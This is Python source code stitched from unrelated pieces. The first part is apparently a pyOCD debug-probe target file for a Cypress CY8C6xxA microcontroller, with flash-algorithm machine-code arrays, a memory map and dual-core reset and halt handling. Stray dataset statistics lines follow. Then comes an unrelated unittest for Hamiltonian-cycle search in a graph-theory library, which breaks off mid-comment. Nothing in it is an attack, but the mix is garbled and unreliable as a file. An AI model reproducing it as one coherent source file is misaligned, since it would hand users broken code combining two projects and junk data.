0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x000009f4,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x10000000,
'flash_size': 0x200000,
'sector_sizes': (
(0x0, 0x200),
)
}
flash_algo_work = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f972, 0x4604b510, 0xf0004620, 0xbd10f915,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f96c, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ad7, 0xd8fa428a,
0xb5084770, 0x48d54669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049c1, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749a9, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48892700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d812400, 0x2401e002,
0x35204d7f, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48734611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d5d, 0x495e3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4859, 0xbd38ff96, 0x4604b538, 0x447d4d54, 0x49563dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff4851, 0xbd38ff84, 0x4604b538, 0x447d4d4b, 0x494d3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4848, 0xbd38ff72, 0x4c47b518, 0x4947447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4844, 0xbd18ff66, 0x4606b570, 0x2500460c, 0x4630e00a, 0xffb6f7ff, 0x2d004605,
0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00, 0x4628bf00, 0xb510bd70, 0x21402400, 0x06802005,
0xffe4f7ff, 0x46204604, 0xb5f8bd10, 0x460e4605, 0x4c304617, 0x3c5c447c, 0x46204930, 0xfe94f7ff,
0x310721ff, 0xf7ff1d20, 0x4629fe8f, 0x30084620, 0xfe8af7ff, 0x46204631, 0xf7ff300c, 0x4669fe85,
0xf7ff4826, 0xbdf8ff28, 0x4605b5f8, 0x4617460e, 0x447c4c20, 0x49223c9a, 0xf7ff4620, 0x21fffe75,
0x1d203107, 0xfe70f7ff, 0x46204629, 0xf7ff3008, 0x4631fe6b, 0x300c4620, 0xfe66f7ff, 0x48184669,
0xff09f7ff, 0xb570bdf8, 0xb081b0ff, 0x26004605, 0xe0032400, 0x46692000, 0x1c645508, 0x02402001,
0xdbf74284, 0x46694602, 0xf7ff4628, 0x4606ffcd, 0xb07f4630, 0xbd70b001, 0x00000d05, 0x40200000,
0x40220000, 0x00000240, 0x40221008, 0x1c000100, 0x14000100, 0x00000128, 0x0a000100, 0x06000100,
0x05000100, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x000009f8,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x14000000,
'flash_size': 0x8000,
'sector_sizes': (
(0x0, 0x200),
)
}
flash_algo_sflash = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f9aa, 0x4604b510, 0xf0004620, 0xbd10f976,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f94d, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ae4, 0xd8fa428a,
0xb5084770, 0x48e24669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049ce, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749b6, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48962700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d8e2400, 0x2401e002,
0x35204d8c, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48804611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d6a, 0x496b3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4866, 0xbd38ff96, 0x4604b538, 0x447d4d61, 0x49633dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff485e, 0xbd38ff84, 0x4604b538, 0x447d4d58, 0x495a3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4855, 0xbd38ff72, 0x4c54b518, 0x4954447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4851, 0xbd18ff66, 0x4605b5f8, 0x4617460e, 0x447c4c4c, 0x494d3c1e, 0xf7ff4620,
0x21fffeb3, 0x1d203107, 0xfeaef7ff, 0x46204629, 0xf7ff3008, 0x4631fea9, 0x300c4620, 0xfea4f7ff,
0x48434669, 0xff47f7ff, 0xb570bdf8, 0xb081b0ff, 0x26004605, 0xe0032400, 0x46692000, 0x1c645508,
0x02402001, 0xdbf74284, 0x46694602, 0xf7ff4628, 0x4606ffcd, 0xb07f4630, 0xbd70b001, 0x4606b570,
0x2500460c, 0x4630e00a, 0xffdff7ff, 0x2d004605, 0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00,
0x4628bf00, 0xb510bd70, 0xbf002400, 0x48292104, 0xffe4f7ff, 0x2c004604, 0xe015d000, 0x48262101,
0xffdcf7ff, 0x2c004604, 0xe00dd000, 0x48232106, 0xffd4f7ff, 0x2c004604, 0xe005d000, 0x48202102,
0xffccf7ff, 0xbf004604, 0x4620bf00, 0xb5f8bd10, 0x460e4605, 0x4c1b4617, 0x491b447c, 0xf7ff4620,
0x21fffe43, 0x1d203107, 0xfe3ef7ff, 0x46204629, 0xf7ff3008, 0x4631fe39, 0x300c4620, 0xfe34f7ff,
0x48114669, 0xfed7f7ff, 0x0000bdf8, 0x00000d05, 0x40200000, 0x40220000, 0x00000288, 0x40221008,
0x1c000100, 0x14000100, 0x00000170, 0x0a000100, 0x05000100, 0x16000800, 0x16001a00, 0x16005a00,
0x16007c00, 0x00000070, 0x06000100, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x00000a40,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x16000000,
'flash_size': 0x8000,
'sector_sizes': (
(0x0, 0x200),
)
}
ERASE_ALL_WEIGHT = 0.5 # Time it takes to perform a chip erase
ERASE_SECTOR_WEIGHT = 0.05 # Time it takes to erase a page
PROGRAM_PAGE_WEIGHT = 0.07 # Time it takes to program a page (Not including data transfer time)
class CY8C6xxA(CoreSightTarget):
VENDOR = "Cypress"
memoryMap = MemoryMap(
RomRegion(start=0x00000000, length=0x20000),
FlashRegion(start=0x10000000, length=0x200000, blocksize=0x200,
is_boot_memory=True,
erased_byte_value=0,
algo=flash_algo_main,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x14000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
algo=flash_algo_work,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x16000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
is_testable=False,
algo=flash_algo_sflash,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
RamRegion(start=0x08000000, length=0x10000)
)
def __init__(self, link):
super(CY8C6xxA, self).__init__(link, self.memoryMap)
def create_init_sequence(self):
seq = super(CY8C6xxA, self).create_init_sequence()
seq.replace_task('create_cores', self.create_cy8c6xx7_core)
return seq
def create_cy8c6xx7_core(self):
core0 = CortexM_CY8C6xxA(self, self.aps[1], self.memory_map, 0)
core0.default_reset_type = self.ResetType.SW_SYSRESETREQ
core1 = CortexM_CY8C6xxA(self, self.aps[2], self.memory_map, 1)
core1.default_reset_type = self.ResetType.SW_SYSRESETREQ
self.aps[1].core = core0
self.aps[2].core = core1
core0.init()
core1.init()
self.add_core(core0)
self.add_core(core1)
class CortexM_CY8C6xxA(CortexM):
def reset(self, reset_type=None):
self.notify(Notification(event=Target.EVENT_PRE_RESET, source=self))
self._run_token += 1
if reset_type is Target.ResetType.HW:
self.session.probe.reset()
sleep(0.5)
self._ap.dp.init()
self._ap.dp.power_up_debug()
# This is ugly, but FPB gets disabled after HW Reset so breakpoints stop working
self.bp_manager._fpb.enable()
else:
if reset_type is Target.ResetType.SW_VECTRESET:
mask = CortexM.NVIC_AIRCR_VECTRESET
else:
mask = CortexM.NVIC_AIRCR_SYSRESETREQ
try:
self.write_memory(CortexM.NVIC_AIRCR, CortexM.NVIC_AIRCR_VECTKEY | mask)
self.flush()
except exceptions.TransferError:
self.flush()
with Timeout(5.0) as t_o:
while t_o.check():
try:
dhcsr_reg = self.read32(CortexM.DHCSR)
if (dhcsr_reg & CortexM.S_RESET_ST) == 0:
break
except exceptions.TransferError:
self.flush()
self._ap.dp.init()
self._ap.dp.power_up_debug()
sleep(0.01)
self.notify(Notification(event=Target.EVENT_POST_RESET, source=self))
def wait_halted(self):
with Timeout(5.0) as t_o:
while t_o.check():
try:
if not self.is_running():
return
except exceptions.TransferError:
self.flush()
sleep(0.01)
else:
raise Exception("Timeout waiting for target halt")
def reset_and_halt(self, reset_type=None):
self.halt()
self.reset(reset_type)
sleep(0.5)
self.halt()
self.wait_halted()
if self.core_number == 0:
vtbase = self.read_memory(0x40201120) # VTBASE_CM0
elif self.core_number == 1:
vtbase = self.read_memory(0x40200200) # VTBASE_CM4
else:
raise Exception("Invalid CORE ID")
vtbase &= 0xFFFFFF00
if vtbase < 0x10000000 or vtbase > 0x18000000:
logging.info("Vector Table address invalid (0x%08X), will not halt at main()", vtbase)
return
entry = self.read_memory(vtbase + 4)
if entry < 0x10000000 or entry > 0x18000000:
logging.info("Entry Point address invalid (0x%08X), will not halt at main()", entry)
return
self.set_breakpoint(entry)
self.reset(self.ResetType.SW_SYSRESETREQ)
sleep(0.2)
self.wait_halted()
self.remove_breakpoint(entry)
| 68.681188
| 103
| 0.718602
| 2,934
| 34,684
| 8.421609
| 0.214724
| 0.944595
| 1.41325
| 1.879477
| 0.769962
| 0.760654
| 0.74653
| 0.735845
| 0.735845
| 0.722004
| 0
| 0.603911
| 0.202428
| 34,684
| 504
| 104
| 68.81746
| 0.289303
| 0.033157
| 0
| 0.61678
| 0
| 0
| 0.025224
| 0
| 0
| 0
| 0.605701
| 0
| 0
| 1
| 0.013605
| false
| 0
| 0.022676
| 0
| 0.054422
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bcb97e2601de7c72d09ffa9907024254801a81f0
| 3,581
|
py
|
Python
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 36
|
2015-09-20T20:55:39.000Z
|
2021-09-20T05:49:03.000Z
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 6
|
2016-03-25T21:41:46.000Z
|
2020-02-12T03:18:59.000Z
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 9
|
2016-09-12T07:57:27.000Z
|
2022-03-21T16:15:39.000Z
|
#!/usr/bin/python
import unittest
from graphtheory.structures.edges import Edge
from graphtheory.structures.graphs import Graph
from graphtheory.hamiltonian.hamilton import *
# 0 --------- 5
# | \ / |
# | 1 --- 4 |
# | / \ |
# 2 --------- 3
class TestHamiltonianCycle(unittest.TestCase):
def setUp(self):
# 3-prism graph, Halin graph
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=False)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(0, 2), Edge(0, 5), Edge(1, 2),
Edge(1, 4), Edge(2, 3), Edge(3, 4), Edge(3, 5), Edge(4, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_hamilton(self):
algorithm = HamiltonianCycleDFS(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [0, 1, 2, 3, 4, 5, 0]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_edges(self):
algorithm = HamiltonianCycleDFSWithEdges(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 2), Edge(2, 3),
Edge(3, 4), Edge(4, 5), Edge(5, 0)]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_cycle_graph(self):
algorithm = HamiltonianCycleDFSWithGraph(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 2), Edge(2, 3),
Edge(3, 4), Edge(4, 5), Edge(5, 0)]
#print "undirected", list(algorithm.hamiltonian_cycle.iteredges())
for edge in expected_cycle:
self.assertTrue(algorithm.hamiltonian_cycle.has_edge(edge))
def tearDown(self): pass
# 0 ----------o 5
# o \ o |
# | o / |
